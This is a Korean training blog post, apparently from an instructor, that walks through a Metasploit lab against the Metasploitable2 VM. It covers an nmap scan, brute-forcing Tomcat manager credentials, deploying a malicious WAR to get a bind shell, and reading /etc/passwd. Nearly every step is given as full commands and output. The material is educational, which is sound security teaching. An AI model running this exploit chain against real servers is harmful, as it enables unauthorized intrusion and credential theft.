정보보안(구버전)/Metasploit 2016. 6. 3. 13:39

Metasploit - 08. 취약점 발견 및 공격 (Tomcat 취약점)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

[실습 시스템] Kali Linux, Firewall, Metasploitable2-Linux

 

 

 - 톰켓(Tomcat) : 'http://net123.tistory.com/245' 참고

 

 

 

[실습 단계]

 

스캔 -> Tomcat 취약점 공격 -> 관리자 ID/PASSWORD 획득 -> Tomcat 관리자 페이지 접속 실시 ->

 

-> 악성 코드 업로드 실시 -> Metasploitable2-Linux 제어권 획득

 

 

 

Ex1) '192.168.20.204' 스캔 실시

 

 - nmap을 이용하여 '192.168.20.204'에 대해서 스캔을 실시한다.

 

@ Kali Linux

 

root@kali:~# nmap -sV 192.168.20.204

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-03 14:09 KST
Nmap scan report for 192.168.20.204
Host is up (0.00022s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  shell       Netkit rshd
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:34:5A:8A (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.39 seconds

 

 

 

 

Ex2) Metasploitable2-Linux 톰켓 서버 접속 테스트

 

@ Kali Linux

 

 - 파이어폭스를 이용하여 Metasploitable2-Linux 톰켓 서버 접속이 되는지 확인한다.

 

 root@kali:~# firefox http://192.168.20.204:8180

 root@kali:~# firefox http://192.168.20.204:8180/manager/html

 

 

 

 

Ex3) Tomcat 취약점 공격 실시

 

root@kali:~# msfconsole -q


msf > search tomcat

~ 중간 생략 ~

 

msf > search tomcat_mgr_login

Matching Modules
================

   Name                                     Disclosure Date  Rank    Description
   ----                                     ---------------  ----    -----------
   auxiliary/scanner/http/tomcat_mgr_login                   normal  Tomcat Application Manager Login Utility

 

 

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) >
msf auxiliary(tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   PASSWORD                                                                                          no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target address range or CIDR identifier
   RPORT             8080                                                                            yes       The target port
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
~ 중간 생략 ~

 

 

msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.20.204
RHOSTS => 192.168.20.204

msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180


msf auxiliary(tomcat_mgr_login) > exploit

[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: admin:admin (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: admin:role1 (Incorrect: )

~ 중간 생략 ~

 

[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: tomcat:role1 (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: tomcat:root (Incorrect: )
[+] 192.168.20.204:8180 - LOGIN SUCCESSFUL: tomcat:tomcat
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:admin (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:manager (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:role1 (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:root (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:tomcat (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: both:s3cret (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: j2deployer:j2deployer (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: cxsdk:kdsxc (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: root:owaspbwa (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: ADMIN:ADMIN (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: xampp:xampp (Incorrect: )
[-] 192.168.20.204:8180 TOMCAT_MGR - LOGIN FAILED: QCC:QLogic66 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) >
msf auxiliary(tomcat_mgr_login) > exit
root@kali:~#

 


 

 

Ex4) Metasploitable2-Linux 톰켓 관리자 페이지 'tomcat/tomcat'으로 접속 실시

 root@kali:~# firefox http://192.168.20.204:8180/manager/html

 

 

'tomcat/tomcat' 로그인 실시

 

 

 

 

톰켓 관리자 페이지 로그인 성공

 

 

 

WAR 파일 업로드 가능

 

 

 

 

Ex5) 악성 코드 업로드 공격 실시

 

root@kali:~# msfconsole -q

msf > search tomcat_mgr_deploy

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/multi/http/tomcat_mgr_deploy  2009-11-09       excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution

 


msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) >
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic

 

 

msf exploit(tomcat_mgr_deploy) > show payloads

Compatible Payloads
===================

   Name                            Disclosure Date  Rank    Description
   ----                            ---------------  ----    -----------
   generic/custom                                   normal  Custom Payload
   generic/shell_bind_tcp                           normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                        normal  Generic Command Shell, Reverse TCP Inline
   java/meterpreter/bind_tcp                        normal  Java Meterpreter, Java Bind TCP Stager
   java/meterpreter/reverse_http                    normal  Java Meterpreter, Java Reverse HTTP Stager
   java/meterpreter/reverse_https                   normal  Java Meterpreter, Java Reverse HTTPS Stager
   java/meterpreter/reverse_tcp                     normal  Java Meterpreter, Java Reverse TCP Stager
   java/shell/bind_tcp                              normal  Command Shell, Java Bind TCP Stager
   java/shell/reverse_tcp                           normal  Command Shell, Java Reverse TCP Stager
   java/shell_reverse_tcp                           normal  Java Command Shell, Reverse TCP Inline

 

 

msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat             //  set HTTPPASSWORD tomcat
PASSWORD => tomcat


msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.20.204
RHOST => 192.168.20.204


msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180


msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat             //  set USERNAMEPASSWORD tomcat
USERNAME => tomcat

 

msf exploit(tomcat_mgr_deploy) > set PAYLOAD java/shell/bind_tcp
PAYLOAD => java/shell/bind_tcp

 

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     192.168.20.204   yes       The target address
   RPORT     8180             yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Payload options (java/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.20.204   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic

 


msf exploit(tomcat_mgr_deploy) > exploit

[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6070 bytes as vWzzfJQnXBNpnKWRqgDlpvtW.war ...
[*] Executing /vWzzfJQnXBNpnKWRqgDlpvtW/80DdE2UD8LI6z1F7aNIX34OiaC99nM.jsp...
[*] Undeploying vWzzfJQnXBNpnKWRqgDlpvtW ...
[*] Sending stage (2952 bytes) to 192.168.20.204
[*] Command shell session 1 opened (192.168.20.50:42280 -> 192.168.20.204:4444) at 2016-06-03 14:48:15 +0900

 

 

uname -a      
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

hostname
metasploitable

 

dir
bin    dev   initrd  lost+found  nohup.out root  sys  var
boot   etc   initrd.img  media      opt sbin  tmp  vmlinuz
cdrom  home  lib  mnt      proc srv   usr

 

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
~ 중간 생략 ~

 

id              
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)

 

exit

[*] 192.168.20.204 - Command shell session 2 closed.  Reason: Died from EOFError

msf exploit(tomcat_mgr_deploy) >
msf exploit(tomcat_mgr_deploy) > quit
root@kali:~#

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)


Metasploit - 제1장 메타스플로잇 (metaspliot)   

 

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q